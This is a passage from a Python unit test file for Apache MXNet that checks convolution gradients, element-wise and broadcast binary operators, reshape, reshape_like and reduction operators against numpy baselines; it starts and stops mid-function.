wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
